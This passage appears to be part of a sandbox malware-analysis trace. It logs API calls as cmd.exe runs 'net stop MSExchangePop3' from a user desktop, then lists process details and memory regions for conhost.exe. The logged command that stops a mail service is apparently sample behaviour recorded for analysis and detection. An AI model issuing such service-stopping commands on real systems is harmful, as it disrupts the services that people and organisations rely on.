returned="/c net stop MSExchangePop3" [0138.582] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.582] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x50b9cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0138.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.582] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.582] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0138.582] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0138.582] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0138.582] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0138.582] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0138.582] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0138.582] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0138.582] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0138.582] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0138.582] GetEnvironmentStringsW () returned 0x50b7d68* [0138.582] FreeEnvironmentStringsA (penv="A") returned 1 [0138.582] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.583] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.583] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0138.583] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0138.583] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0138.583] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0138.583] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0138.583] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0138.583] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0138.583] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0138.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f3fb88 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.583] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f3fb88, lpFilePart=0x4f3fb80 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f3fb80*="Desktop") returned 0x1d [0138.583] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.583] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f3f908 | out: lpFindFileData=0x4f3f908) returned 0x50b05c8 [0138.583] FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0138.583] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f3f908 | out: lpFindFileData=0x4f3f908) returned 0x50b05c8 [0138.583] FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0138.583] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0138.583] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f3f908 | out: lpFindFileData=0x4f3f908) returned 0x50b05c8 [0138.583] FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0138.583] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.583] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0138.583] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0138.584] GetEnvironmentStringsW () returned 0x50b7d68* [0138.584] FreeEnvironmentStringsA (penv="=") returned 1 [0138.584] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.584] GetConsoleOutputCP () returned 0x1b5 [0138.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.584] GetUserDefaultLCID () returned 0x409 [0138.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f3fcb8, cchData=128 | out: lpLCData="0") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f3fcb8, cchData=128 | out: lpLCData="0") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f3fcb8, cchData=128 | out: lpLCData="1") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0138.585] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0138.585] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0138.586] GetConsoleTitleW (in: lpConsoleTitle=0x50ba9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.586] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0138.586] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0138.586] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0138.586] _wcsicmp (_String1="net", _String2=")") returned 69 [0138.586] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0138.586] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0138.586] _wcsicmp (_String1="IF", _String2="net") returned -5 [0138.586] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0138.586] _wcsicmp (_String1="REM", _String2="net") returned 4 [0138.586] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0138.587] GetConsoleTitleW (in: lpConsoleTitle=0x4f3f9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.587] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.587] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.588] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.588] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.588] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.588] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.588] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.588] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.588] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.588] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.588] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.588] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.588] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.588] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.588] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.588] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.588] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.588] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.588] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.588] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.588] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.588] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.588] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.588] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.588] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.588] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.588] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.588] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.588] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.589] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.589] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.589] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.589] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.589] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.589] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.589] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.589] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.589] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.589] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.589] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.589] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.589] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.589] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.589] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.589] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.589] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.589] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.589] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.589] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.589] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.589] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.589] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.589] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.589] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.589] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.589] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0138.589] _wcsicmp (_String1="net", _String2="IF") returned 5 [0138.589] _wcsicmp (_String1="net", _String2="REM") returned -4 [0138.589] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0138.589] SetErrorMode (uMode=0x0) returned 0x0 [0138.589] SetErrorMode (uMode=0x1) returned 0x0 [0138.589] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x50b05d0, lpFilePart=0x4f3f4ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f3f4ac*="Desktop") returned 0x1d [0138.589] SetErrorMode (uMode=0x0) returned 0x1 [0138.590] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.590] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.597] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.597] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.597] GetConsoleTitleW (in: lpConsoleTitle=0x4f3f72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.597] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f3f658, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f3f63c | out: lpAttributeList=0x4f3f658, lpSize=0x4f3f63c) returned 1 [0138.597] UpdateProcThreadAttribute (in: lpAttributeList=0x4f3f658, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f3f644, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f3f658, lpPreviousValue=0x0) returned 1 [0138.597] GetStartupInfoW (in: lpStartupInfo=0x4f3f690 | out: lpStartupInfo=0x4f3f690*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0138.597] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.597] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.597] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.597] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.598] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.598] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0138.599] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangePop3", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f3f5e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangePop3", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f3f62c | out: lpCommandLine="net stop MSExchangePop3", lpProcessInformation=0x4f3f62c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9cc, dwThreadId=0xff4)) returned 1 [0138.605] CloseHandle (hObject=0xa4) returned 1 [0138.605] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.605] GetEnvironmentStringsW () returned 0x50b9ed0* [0138.606] FreeEnvironmentStringsA (penv="=") returned 1 [0138.606] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0138.724] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f3f5c4 | out: lpExitCode=0x4f3f5c4*=0x2) returned 1 [0138.724] CloseHandle (hObject=0xa8) returned 1 [0138.724] _vsnwprintf (in: _Buffer=0x4f3f6ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f3f5cc | out: _Buffer="00000002") returned 8 [0138.725] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0138.725] GetEnvironmentStringsW () returned 0x50bb3c0* [0138.725] FreeEnvironmentStringsA (penv="=") returned 1 [0138.725] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0138.725] GetEnvironmentStringsW () returned 0x50bb3c0* [0138.725] FreeEnvironmentStringsA (penv="=") returned 1 [0138.725] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f3f658 | out: lpAttributeList=0x4f3f658) [0138.725] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.725] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.725] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.725] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.725] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.725] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.726] SetConsoleInputExeNameW () returned 0x1 [0138.726] GetConsoleOutputCP () returned 0x1b5 [0138.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.726] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.726] exit (_Code=2) Thread: id = 690 os_tid = 0xfe0 Process: id = "230" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29d85000" os_pid = "0xfd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "229" os_parent_pid = "0xfc0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11210 start_va = 0x7fa74000 end_va = 0x7fa74fff entry_point = 0x0 region_type = private name = "private_0x000000007fa74000" filename = "" Region: id = 11211 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11212 start_va = 0x438ad90000 end_va = 0x438adaffff entry_point = 0x0 region_type = private name = "private_0x000000438ad90000" filename = "" Region: id = 11213 start_va = 0x438adb0000 end_va = 0x438adc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438adb0000" filename = "" Region: id = 11214 start_va = 0x438add0000 end_va = 0x438ae0ffff entry_point = 0x0 region_type = private name = "private_0x000000438add0000" filename = "" Region: id = 11215 start_va = 0x7df5ff9d0000 end_va = 0x7ff5ff9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9d0000" filename = "" Region: id = 11216 start_va = 0x7ff6c4550000 end_va = 0x7ff6c4572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4550000" filename = "" Region: id = 11217 start_va = 0x7ff6c457c000 end_va = 0x7ff6c457cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457c000" filename = "" Region: id = 11218 start_va = 0x7ff6c457e000 end_va = 0x7ff6c457ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457e000" filename = "" Region: id = 11219 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11220 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11221 start_va = 0x438ad90000 end_va = 0x438ad9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438ad90000" filename = "" Region: id = 11222 start_va = 0x438ada0000 end_va = 0x438ada6fff entry_point = 0x0 region_type = private name = "private_0x000000438ada0000" filename = "" Region: id = 11223 start_va = 0x438ae10000 end_va = 0x438aecdfff entry_point = 0x438ae10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11224 start_va = 0x438aed0000 end_va = 0x438afcffff entry_point = 0x0 region_type = private name = "private_0x000000438aed0000" filename = "" Region: id = 11225 start_va = 0x438afd0000 end_va = 0x438b00ffff entry_point = 0x0 region_type = private name = "private_0x000000438afd0000" filename = "" Region: id = 11226 start_va = 0x438b010000 end_va = 0x438b010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438b010000" filename = "" Region: id = 11227 start_va = 0x438b020000 end_va = 0x438b02ffff entry_point = 0x0 region_type = private name = "private_0x000000438b020000" filename = "" Region: id = 11228 start_va = 0x438b030000 end_va = 0x438b036fff entry_point = 0x0 region_type = private name = "private_0x000000438b030000" filename = "" Region: id = 11229 start_va = 0x438b040000 end_va = 0x438b1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438b040000" filename = "" Region: id = 11230 start_va = 0x438b1d0000 end_va = 0x438b350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438b1d0000" filename = "" Region: id = 11231 start_va = 0x438b360000 end_va = 0x438c75ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000438b360000" filename = "" Region: id = 11232 start_va = 0x438c760000 end_va = 0x438c760fff entry_point = 0x0 region_type = private name = "private_0x000000438c760000" filename = "" Region: id = 11233 start_va = 0x438c770000 end_va = 0x438c770fff entry_point = 0x0 region_type = private name = "private_0x000000438c770000" filename = "" Region: id = 11234 start_va = 0x7ff6c4450000 end_va = 0x7ff6c454ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4450000" filename = "" Region: id = 11235 start_va = 0x7ff6c457a000 end_va = 0x7ff6c457bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457a000" filename = "" Region: id = 11236 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11237 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = 